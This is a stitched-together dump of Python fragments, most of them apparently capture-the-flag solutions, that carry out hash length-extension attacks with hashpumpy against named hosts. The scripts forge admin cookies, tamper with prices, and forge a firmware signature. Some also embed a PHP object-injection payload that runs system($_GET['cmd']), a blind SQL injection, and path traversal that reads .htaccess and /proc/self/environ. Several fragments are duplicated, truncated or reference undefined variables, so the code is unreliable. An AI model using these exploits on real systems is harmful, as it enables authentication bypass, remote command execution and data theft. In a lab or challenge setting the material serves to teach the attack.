def playground(): key = make_key() message = 'hello, world' s1 = sign(message, key) #s2 = sign(message + ' foo', key) def thing(message, signature): if check(message, signature, key): print 'This was signed by me :)' else: print 'This was not signed by me >:( ' # correctly determines when message was signed with key thing(message, s1) # detects when you modified the message thing(message + ' give me money!', s1) # doesn't detect modifed message when using length extension attack with known key length s2, modified_message = hashpump(s1, message, ' foo', len(key)) thing(modified_message, s2) # brute force the key length for n in xrange(8, 32): s2, modified_message = hashpump(s1, message, ' foo', n) thing(modified_message, s2)
def modify(o, key_len): split = '&sign=' index = o.find(split) signature = o[index + len(split):] message = o[:index] new_signature, modified_message = hashpump(signature, message, '&price=1', key_len) return modified_message + split + new_signature
def exploit(): p = None while p == None: p = fast_challenge() p.recvline_contains('-----------------------------------') # wait motd p.sendline('1') # Pick oranges p.sendline('1') # 1 onrage item, checksum = p.recvline_startswith('num=').split('-----', 1) print "[+] hash = %s" % checksum print "[+] item = %s" % item for length in range(16, 0, -1): print '[*] Trying with length = %d' % length new_hash, value = hashpump(checksum, item, '&price=-10000000', length) payload = '%s-----%s' % (value, new_hash) print '[+] payload = %s' % repr(payload) p.sendline('2') p.sendline(payload) if success_to_buy_or_not(p): break p.sendline('4') # flag? print print p.recvline_contains('the flag is').split(' ', 4)[-1] print p.close()
def main(): nc = Netcat('140.112.31.96', 10154) nc.read_until('>') nc.write('2\n') nc.read_until('>') nc.read_until('>') nc.write('1\n') token = nc.read_until('>') token = token.split('Token: ')[1].split('===')[0][:-1] ori_data = '&BALSN_Coin=1' app_data = '&BALSN_Coin=100000000000' is_invalid = '' length = 44 while 'Here is your flag!' not in is_invalid: nc.write('3\n') nc.read_until('>') nc.read_until('>') tmp = hashpumpy.hashpump(token, ori_data, app_data, length) nc.write(base64.b64encode(tmp[1].split('Coin=', 1)[1]) + '\n') nc.read_until('>') nc.write(tmp[0] + '\n') is_invalid = nc.read_until('>') if 'Here is your flag!' in is_invalid: print is_invalid.split('Here is your flag!')[1][1:].split( '\n===')[0] exit(1) length += 1 if length > 54: break exit(0)
def pwn_aarhus(): base_url = 'http://{}:{}/'.format(HOST, PORT) oracle = AarhusOracle() pwner = CBCOraclePwner(oracle, verbose=True, block_size=8, nesting_level=3) s = requests.session() s.post(base_url + 'login/', data={'username': '******', 'password': '******'}) cookie = s.cookies['auth'] print("[+] got cookie: {}".format(cookie)) ct_1 = base64.b64decode(cookie, altchars=b'-_') print("[+] got encrypted message 1: {}".format(hexlify(ct_1).decode())) pt_1 = pwner.decrypt_unpad_msg(ct_1) print("[+] got tagged plaintext: {}".format(pt_1)) tag_size = 16 mac, original_data = pt_1[:tag_size], pt_1[tag_size:] # print("mac", mac) # print("original_data", original_data) extension = b'&username=almighty_administrator&is_admin=of_course' print("[+] doing length extension with: {}".format(extension)) new_mac, new_msg = hashpump(hexlify(mac), original_data, extension, 16) new_mac = unhexlify(new_mac) print("[+] got new mac: {}".format(new_mac)) print("[+] for message: {}".format(new_msg)) new_pt = new_mac + new_msg new_ct = pwner.encrypt_pad_msg(new_pt) print("[+] encrypted new message: {}".format(hexlify(new_ct).decode())) del s.cookies['auth'] s.cookies['auth'] = base64.b64encode(new_ct, altchars=b'-_').decode() res = s.get(base_url + 'flag/') m = re.search(r'(flag|FLAG)\{[^}]+\}', res.text) assert (m) flag = m.group(0) print("[+] recovered flag:") print(flag)
def main(): hex_digest = "571580b26c65f306376d4f64e53cb5c7" original_data = "adminadmin" data_to_add = "aaaaa" key_length = 15 md5, password = hashpumpy.hashpump(hex_digest, original_data, data_to_add, key_length) print("New Md5: {}, Original+Payload: {}".format(md5, password))
def pump_hash(add): hexdigest = "4e4cd23864dadbe92508e28c30912f5f46ea550a073ac3e0164305fe6006b69d" original_data = "username=admin" data_to_add = add key_length = 32 res = hashpumpy.hashpump(hexdigest, original_data, data_to_add, key_length) cookie = res[1] + "-" + res[0] return cookie
def hashattack(s): s = unquote(s) header, payload, signature = s.split(".") #signature_new, payload_new = hashpumpy.hashpump(b64decode(signature), b64decode(header) + "." + b64decode(payload), "&isAdmin=true", 8) signature_new, payload_new = hashpumpy.hashpump(b64decode(signature), b64decode(payload), "&isAdmin=true", 8) return quote(header + "." + b64encode(payload_new) + "." + b64encode(signature_new))
def get_flag(sign): string0="scan" string1="read" a, b = hashpumpy.hashpump(sign,string0,string1,39) print(a,"\n",b) cookie={"action":str(b)[2:-1].replace("\\x","%"),"sign":a} p=req.get(url+"/De1ta?param=/proc/self/cwd/flag.txt",cookies=cookie) return(p.content.decode('utf-8'))
def get_admin_cookie(data, sig): data_to_add = ";username="******";secret=" + admin_secret + ";" for i in range(8, 15): (new_sig, new_data) = hashpump(sig.hex(), data, data_to_add, i) b64_new_data = b64encode(new_data).decode('utf-8') b64_new_sig = b64encode(binascii.unhexlify(new_sig)).decode('utf-8') cookie = b64_new_data + "." + b64_new_sig resp = requests.get(url + "/admin", cookies={"auth": cookie}) if resp.status_code == 200: return str(cookie) break
def webre(): #py2 url = 'http://web.jarvisoj.com:32778/' sha = '3a4727d57463f122833d9e732f94e4e0' string0 = ';"tseug":5:s' string1 = ';"nimda":5:s' for i in range(15): digest, message = hashpumpy.hashpump(sha, string0, string1, i) payload = {'role': urllib.quote(message[::-1]), 'hsh': digest} #payload ={'role':(message[::-1]), 'hsh':digest} print i, payload html = requests.get(url, cookies=payload).text #提交答案 if 'Welcome' in html: print html
def run(args): j, i = args s.post('http://200.200.200.108/login_chk.php', data={'id': 'guest', 'pw': 'guest'}) r = s.get("http://200.200.200.108/?p=read.php&no=" + quote(original)) payload = "\n AND 0 OR (ord(reverse(lpad((SELECT LENGTH(F14G) FROM FlagPart1),%d,space(1))))&%d)" % (j + 1, 1 << i) digest = s.cookies['integrity'] digest, message = hashpump(digest, original, payload, len(key)) del s.cookies['integrity'] s.cookies['integrity'] = digest r = s.get('http://200.200.200.108/?p=read.php&no=' + quote(message)) result = 'do our best' in r.text del s.cookies['integrity'] return result
def getflag(host, port): wc = WebChecker(str(host), str(port)) wc.register() cookies = wc.login() gg = hashpump(cookies['user_cookie'], wc.username, 'vip', int(cookies['secretkey_length'])) cookies['user_cookie'] = gg[0] cookies['username'] = gg[1].encode('hex') se = req.session() url = 'http://%s:%s/' % (host, port) rs = se.get(url + 'user', cookies=cookies) dom = PQ(rs.text) flag = dom("div.alert.alert-success") flag = PQ(flag).text().strip() print flag
def forge_stuff(salt_length): with open("firmware.bin", "r") as fh: original_data = fh.read() with open("firmware.sig", "r") as fh: original_sig = fh.read() data_to_add = "\ncat /flag" result = hashpump(original_sig, original_data, data_to_add, salt_length) with open("payload.sig", "w") as fh: fh.write(result[0]) with open("payload.bin", "wb") as fh: fh.write(result[1])
def attack(): url = 'http://web.jarvisoj.com:32778/' old_cookie = '3a4727d57463f122833d9e732f94e4e0' str1 = 's:5:"guest";' str2 = 's:5:"admin";' str1 = str1[::-1] #倒过来,这道题要role的值反过来求md5 str2 = str2[::-1] for i in range(1, 20): #用于爆破salt的长度 new_cookie, message = hashpumpy.hashpump(old_cookie, str1, str2, i) payload = { 'role': urllib.parse.quote(message[::-1]), 'hsh': new_cookie } #quote()可以把 \x00 变成 %00 ans = requests.get(url, cookies=payload) print(i) print(ans.text) if 'welcome' in ans.text: print(ans.text)
def gogo_power_ranger ( key_length, A, B ) : A.sendline(ID + '||' + N + '||' + sha_it_up(ID + '||' + N)) A.recvuntil("You should send your ID and a random string to me: ") Ns, trash = A.recvline().split('||') B.sendline(ID + '||' + Ns + '||' + sha_it_up(ID + '||' + Ns)) B.recvuntil('You should send your ID and a random string to me: ') trash, mac = B.recvline().split('||') mac = mac.decode('base64').encode('hex') (h, s) = hashpump(h, ID + '||' + Ns + '||login', '||printflag', i) h = base64.b64encode(h.decode('hex')) A.sendline(base64.b64encode(s) + '||' + h) print(base64.b64encode(s) + '||' + h) power_ranger = A.recvline() power_ranger = A.recvline() if 'Integrity error' not in power_ranger: flag.write(A.recvall())
def ciscn(self): rs = self.session.get(self.url + 'test') dom = PQ(rs.text) form = dom("form") token = str( PQ(form[0])("input[name=\"%s\"]" % self.csrfname).attr("value")).strip() rs = self.session.post(self.url + 'test', data={ self.csrfname: token, 'parameter': 'hhhhhhhhhhhh' }) md5_get = rs.headers['md5'] length = rs.headers['length'] result = hashpumpy.hashpump(md5_get, "hhh", "asd", int(length)) parameter = result[1].encode('string-escape').decode('unicode-escape') md5 = result[0].encode('string-escape').decode('unicode-escape') rs = self.session.post(self.url + 'test', data={ self.csrfname: token, 'md5': md5, 'parameter': parameter }) flag = rs.text if re.search(r'ciscn{.*}', flag): print re.search(r'ciscn{.*}', flag).group() return re.search(r'ciscn{.*}', flag).group() else: return False
def forge_cookie(sample_cookie, hash): clear() print("[*] Forging admin cookie...") b64_data, b64_sig = sample_cookie.split('.') data = b64decode(b64_data).decode() # Cookie data sig = b64decode(b64_sig).hex() # Signature append = f';username=admin;secret={hash};' # Data to append for key_length in range(8, 15): # Secret is between 8 and 15 bytes # Use hashpump to append our data to the cookie, without changing the signature new_sig, msg = hashpump(sig, data, append, key_length) # Generate cookie cookie_data = f"{b64encode(msg).decode()}.{b64encode(unhexlify(new_sig)).decode()}" cookie = {'auth': cookie_data} # Check if cookie is valid for admin endpoint if verify_cookie(cookie): return cookie """
import re from urllib import quote original_data = ';"tseug":5:s' original_hash = '3a4727d57463f122833d9e732f94e4e0' append_data = ';"nimda":5:s' for i in range(32): hexdigest = original_hash.encode( 'hex' ) # hexdigest(str): Hex-encoded result of hashing key + original_data. original_data = original_data # original_data(str): Known data used to get the hash result hexdigest. data_to_add = append_data # data_to_add(str): Data to append key_length = i # key_length(int): Length of unknown data prepended to the hash digest, message = hashpumpy.hashpump( hexdigest, original_data, data_to_add, key_length ) # hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message) # print digest, message cookie = {'hsh': digest, 'role': 's%3A5%3A"admin"%3B'} url = 'http://web.phrack.top:32785/' try: r = requests.get(url, cookies=cookie) print message if r.text.find('Your flag is') > 0: finded = True print r.text break
import hashpumpy import base64 print("Welcome to the Hash Extension brute force tool") print("a tool for The Information Technology Syndicate\n") print("Original Digest (in hex):") hexdigest = raw_input() print("Original Data (in ASCII):") original_data = raw_input() print("Data to Add (in ASCII):") data_to_add = raw_input() print("Starting Key Length:") key_length_start = int(raw_input()) print("Ending Key Length:") key_length_end = int(raw_input())+1 for key_length in range (key_length_start, key_length_end): out = hashpumpy.hashpump( hexdigest, original_data, data_to_add, key_length) digest = out[0] message = out[1] query = base64.b64encode(message) newKey = base64.b64encode(digest.decode("hex")) print("--------------------------------") print("Key len:" +str(key_length)) print("Query: "+message) print("Digest: "+digest) print("<query base64> <new digest>:") print(query+" "+newKey)
""" import hashlib import socket import argparse from binascii import unhexlify import hashpumpy p = argparse.ArgumentParser() p.add_argument('-k', '--key-length', required=True, type=int) p.add_argument('-t', '--token', required=True) p.add_argument('-p', '--open-port', required=True, type=int) p.add_argument('-H', '--host', default="::1") p.add_argument('-P', '--host-port', type=int, default=8008) args = p.parse_args() # 2 hex digits for each byte ds = hashlib.sha512().digest_size * 2 given_digest = args.token[:ds] original_data = unhexlify(args.token[ds:]) append_data = unhexlify(hex(args.open_port)[2:]) digest, payload = hashpumpy.hashpump(given_digest, original_data, append_data, args.key_length) s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) s.connect((args.host, args.host_port)) s.sendall(unhexlify(digest) + payload)
def oldSign(url, data): args = {'a': 'sign', 'm': 'old', 'd': data} return visit(url, urlencode(args)) def newVerify(url, data, signature): args = {'a': 'verify', 'm': 'new', 'd': data, 's': signature} return visit(url, urlencode(args)) url = "http://95.138.166.219/" base_msg = "ayylmao" extend_msg = "get flag" i_key_md5 = oldSign(url, "\x36"*blocksize + base_msg).decode('hex') print "[+]Got md5(i_key_pad + '%s') = %s" % (base_msg, i_key_md5.encode('hex')) res = hashpumpy.hashpump(i_key_md5.encode('hex'), base_msg, extend_msg, blocksize) i_key_md5_extend = res[0] forged_msg = res[1] print "[+]Got md5(i_key_pad + '%s') = %s" % (forged_msg, i_key_md5_extend) o_key_md5 = oldSign(url, "\x5C"*blocksize + i_key_md5_extend.decode('hex')) print "[+]Got md5(o_key_pad + md5(i_key_pad + forged_msg).digest()) = %s" % o_key_md5 print "[+]Verification response: [%s]" % newVerify(url, forged_msg, o_key_md5)
import sys try: import hashpumpy except ImportError: print "Missing required hashpumpy library" print "Try 'pip install hashpumpy'" sys.exit(1) # the initial cookie given to us by the server data = 'b:1;' # the valid signature given to us by the server digest = '2141b332222df459fd212440824a35e63d37ef69' # our serialized PHP object add = '\n\x4f\x3a\x34\x3a\x22\x50\x6f\x73\x74\x22\x3a\x33\x3a\x7b\x73\x3a\x38\x3a\x22\x00\x2a\x00\x74\x69\x74\x6c\x65\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x37\x3a\x22\x00\x2a\x00\x74\x65\x78\x74\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x31\x30\x3a\x22\x00\x2a\x00\x66\x69\x6c\x74\x65\x72\x73\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x30\x3b\x4f\x3a\x36\x3a\x22\x46\x69\x6c\x74\x65\x72\x22\x3a\x32\x3a\x7b\x73\x3a\x31\x30\x3a\x22\x00\x2a\x00\x70\x61\x74\x74\x65\x72\x6e\x22\x3b\x73\x3a\x35\x3a\x22\x2f\x2e\x2a\x2f\x65\x22\x3b\x73\x3a\x37\x3a\x22\x00\x2a\x00\x72\x65\x70\x6c\x22\x3b\x73\x3a\x32\x30\x3a\x22\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x22\x63\x6d\x64\x22\x5d\x29\x22\x3b\x7d\x7d\x7d' # assume the keylength hasn't changed; if signature is rejected other lengths can be tried keylen = 8 # get our exploit cookie and its valid signature sig, message = hashpumpy.hashpump(digest, data, add, keylen) def urlencode(s): return ''.join('%%%02x'%ord(c) for c in s) print sig print urlencode(message)
#!/usr/bin/env python3 import hashpumpy, requests, base64 # login as guest user_cookie = 'NmJjYjljOTE1NTk3NWE1M2U5NTFiMGI1MGYxMzc0ODAjbmFtZT1ndWVzdCZhZG1pbj0w' sig, serial = base64.b64decode(user_cookie).decode().split('#') new_sig, new_serial = hashpumpy.hashpump(sig, serial.encode(), '&admin=1', len(sig)) new_cookie = base64.b64encode(new_sig.encode() + b'#' + new_serial).decode() r = requests.get('https://hackme.inndy.tw/login2/', cookies={'user': new_cookie}) print(r.text)
r = remote('bamboofox.cs.nctu.edu.tw', 30000) r.recvuntil(': ') r.recvline().strip() r.recvuntil(': ') auth = r.recvline().strip() # input msg = 'user=someone' append_str = 'user=admin' hmac = auth len_of_key = 40 result = hashpump(auth, msg, append_str, 40) r.recvuntil(': ') r.sendline(b64e(result[1])) r.recvuntil(': ') r.sendline(result[0]) print r.recv(4096)
import hashpumpy import hashlib key = b"KEY" * 4 original_data = b"ORIG" * 4 data_to_add = b"system('/bin/sh')" for algorithm in (hashlib.md5, hashlib.sha1, hashlib.sha256, hashlib.sha512): original_digest = algorithm(key + original_data).hexdigest() new_digest, new_data = hashpumpy.hashpump(original_digest, original_data, data_to_add, len(key)) verify_digest = algorithm(key + new_data).hexdigest() assert new_digest == verify_digest
# function to keep reading the serial until completion (final character is >>) def read_terminal(): end_symbol= '>>' buff ='' while end_symbol not in buff: buff +=str(ser.readline().decode('utf-8')) return buff # print the first prompt print(read_terminal()) # write a command to require the cat file and the passwd file, no prompt answer because the value is incorrect #ser.write(str.encode("#fac1d7b8276cf5c2907dcfa92d5f48607fde0db8#cat.txt:passwd\r\n")) #print(read_terminal()) for i in range(1,10): hash_value,txt = hashpumpy.hashpump('96103df3b928d9edc5a103d690639c94628824f5', 'cat.txt', ':passwd',i) #print('message = ',type(txt)) # message is of type byte #print('hash = ',type(hash_value)) #i hash of type string #All strings are converted in one long command of bytes format to be sent as serial write command print("Command sent for key length = "+ str(i)) print(hash_value.encode('utf-8') + '#'.encode('utf-8') + txt +'\r\n'.encode('utf-8')) #encode everything to type "BYTE" before sending over the command line to the UART ser.write((hash_value + '#').encode('utf-8') + txt +'\r\n'.encode('utf-8')) print(read_terminal())
import hashpumpy import urllib2 import urllib url = "http://178.62.34.76/getAttachment/" origin_sig = "beb2e68c628653c72abcb388b078cfda" origin_data = "file.txt" key_length = 32 while 1: append_data = '?/'+raw_input("path : ") new_signature,new_data = hashpumpy.hashpump(origin_sig,origin_data,append_data,key_length) print 'new signature : %s'%(new_signature) print 'new data : %s'%(new_data).encode('hex') req = urllib2.Request(url+urllib.quote_plus(urllib.quote_plus(new_data))) req.add_header('X-Signature',new_signature) res = urllib2.urlopen(req) print res.read() ''' path : ../../.htaccess new signature : 77a6762d005d965a0ee69202bd67ca28 new data : 66696c652e7478748000000000000000000000000000000040010000000000003f2f2e2e2f2e2e2f2e6874616363657373 RewriteEngine on RewriteRule simple-php-captcha.php simple-php-captcha.php [L] RewriteRule showInformation/(.+) /showInformation.php?informationID=$1 [L] RewriteRule infoSubmit /informationSubmit.php [L] RewriteRule notConfirmedInformation/(.+) /notConfirmedInformation.php?informationID=$1 [L]
#!/usr/bin/env python import hashpumpy import os #file = str(',' + raw_input('> ')) file = ',/proc/self/environ'; for i in range(1,256): new_hash, msg = hashpumpy.hashpump('48b49f65a86cd617e5c7423d23a67738c4057d06','filelocation,list.txt', file ,i) hexfile = msg.encode('hex') num1 = 0 num2 = 0 for i in new_hash: num1 += ord(i) for i in hexfile: num2 += ord(i) magic = num1 * num2 - num1 - num2 ''' print 'Magic:', magic print 'File:', hexfile print 'Hash:', new_hash ''' os.system('curl localhost:17565/view.php --data "magic={}&file={}&mac={}" >> data'.format(magic,hexfile,new_hash))
from pwn import * from hashpumpy import hashpump mac, ext = hashpump('7062c015708b70b81e352f4fbd962ceb', 'icanbeatmuctf', 'givemetheflag', 14) r = remote('127.0.0.1', 10078) r.recvuntil('Your input :') r.sendline(ext) r.recvuntil('The signature :') r.sendline(mac) r.recvuntil('The flag is ') print r.recv()
import os import hashpumpy dump = hashpumpy.hashpump('3b88e265e072d231ec37b67e92bea158', 'name=matesctf', '&role=admin', 12) cookie = (dump[1]+"&sign="+dump[0]).encode('base64').replace("\n", "") print cookie url = "http://weblab02.matesctf.org/web200_c1c6afb055ad6ba7b9dbd3cf39e99633/user.php" os.system("curl --header 'Cookie: token="+cookie+"' "+url)
server_data = r.json() return server_data # server_data = make_request(data) # print(server_data) # sys.exit() signature = '77c635a441ad291897ff1b10cd20f3537ad8458d38295344275a4fe81c398594' for i in range(1, 100): new_signature, new_full_message = hashpump(signature, data['data_to_show'], append_data, i) _data = dict() _data['signature'] = new_signature _data['data_to_show'] = new_full_message server_data = make_request(_data) if server_data.get('error', None) is None: print('KEY LENGTH: ', i) print('Data Sent:', new_full_message) print('Fake Signature:', new_signature) print('Server Response:', server_data) break #libraries
p = remote('13.251.110.215', 10001) p.recv() # order Flag p.sendline("2") p.recvuntil("Item ID: ") p.sendline("5") # extract sign and payment from order payment = p.recv() sp = payment.find('&sign=') sign = payment[sp + 6:] sign = sign[:sign.find('\n')] payment = payment[payment.find('product'):payment.find('&sign')] for keylen in range(8, 32): log.info('trying keylen=' + str(keylen)) n = hashpumpy.hashpump(sign, payment, '&price=1', keylen) order = n[1] + "&sign=" + n[0] p.sendline("3") p.recvuntil("Your order:") p.sendline(order) p.recv(1000) ret = p.recv(1000) if ("Invalid" not in ret): print(ret) print(p.recv()) quit()
# This exploit creates a length extension of the message '6' import hashpumpy import socket if __name__ == '__main__': orig_data = '9' orig_digest = 'a44ce5dbed666647c2d571c91d41385beb16784030e849efae5af7c80f77da0b5f8a6c45d2ab467d781d4b6ffc83edf9b00bebe83d36d92349c0e64a3064ef93' append_data = '999999999999999999999999999999999999999999999999999' sock = socket.socket() sock.connect(('challenges.tamuctf.com', 8812)) sock.recv(1024) for i in range(1, 1000): print i new_digest, new_data = hashpumpy.hashpump(orig_digest, orig_data, \ append_data, i) print('New data: ' + new_data) print('New hash: ' + new_digest) sock.send((str(2) + '\n').encode()) sock.recv(1024) # receive options (doesn't matter) sock.send(new_data + '\n') sock.recv(1024) # receive options (doesn't matter) sock.send(new_digest + '\n') print sock.recv(1024).decode()
import hashpumpy import requests from base64 import * data = {"author": "mrNobody", "note": "hacked"} resp = requests.post("http://crypto.chal.csaw.io:5003/new", data=data).text identifier = resp[19:].split(":")[0] integrity = resp.split(":")[1][0:40] decoded_identifier = b64decode(identifier) identifier_suffix = "&admin=True&access_sensitive=True&entrynum=7" for i in range(256): new_integrity = hashpumpy.hashpump(integrity, decoded_identifier, identifier_suffix, i) resp = requests.post("http://crypto.chal.csaw.io:5003/view", data={ "id": b64encode(new_integrity[1].decode( 'unicode-escape').encode('unicode-escape')), "integrity": new_integrity[0] }).text if "flag" in resp: print(resp.split("\n")[2].split(":")[2][1:]) print("secret length:", i) break
import hashlib import socket import argparse from binascii import unhexlify import hashpumpy p = argparse.ArgumentParser() p.add_argument('-k', '--key-length', required=True, type=int) p.add_argument('-t', '--token', required=True) p.add_argument('-p', '--open-port', required=True, type=int) p.add_argument('-H', '--host', default="::1") p.add_argument('-P', '--host-port', type=int, default=8008) args = p.parse_args() # 2 hex digits for each byte ds = hashlib.sha512().digest_size * 2 given_digest = args.token[:ds] original_data = unhexlify(args.token[ds:]) append_data = unhexlify(hex(args.open_port)[2:]) digest, payload = hashpumpy.hashpump(given_digest, original_data, append_data, args.key_length) s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) s.connect((args.host, args.host_port)) s.sendall(unhexlify(digest) + payload)
def get_md5(msg): plain = SECRET + msg #print("doing an md5 of %s" % plain) plain = plain.encode() return md5(plain).hexdigest() msg_from_server = "data" hash_from_server = get_md5(msg_from_server) print( "Server: I give you a message and the MAC md5(secret+'%s').\ndata: %s\nMAC: %s\n" % (msg_from_server, msg_from_server, hash_from_server)) this_I_want_to_add = "append" msg_to_forge = msg_from_server + this_I_want_to_add forged_hash, forged_msg = hashpump(hash_from_server, msg_from_server, this_I_want_to_add, len(SECRET)) print( "Client: I give you a message and I can spoof the MAC.\nmy data: %s\nspofed MAC: %s" % (msg_to_forge, forged_hash)) print("what I send as data") hexdump(forged_msg) msg_server_check = SECRET + str(forged_msg) hash_server_calculats_with_secret = md5(msg_server_check).hexdigest() print( "Server: I received your message. I try to check you MAC md5(SECRET+yourdata). Result:\n%s" % hash_server_calculats_with_secret)
import hashpumpy import hashlib key = b"KEY"*4 original_data = b"ORIG"*4 data_to_add = b"system('/bin/sh')" for algorithm in (hashlib.md5, hashlib.sha1, hashlib.sha256, hashlib.sha512): original_digest = algorithm(key + original_data).hexdigest() new_digest, new_data = hashpumpy.hashpump(original_digest, original_data, data_to_add, len(key)) verify_digest = algorithm(key + new_data).hexdigest() assert new_digest == verify_digest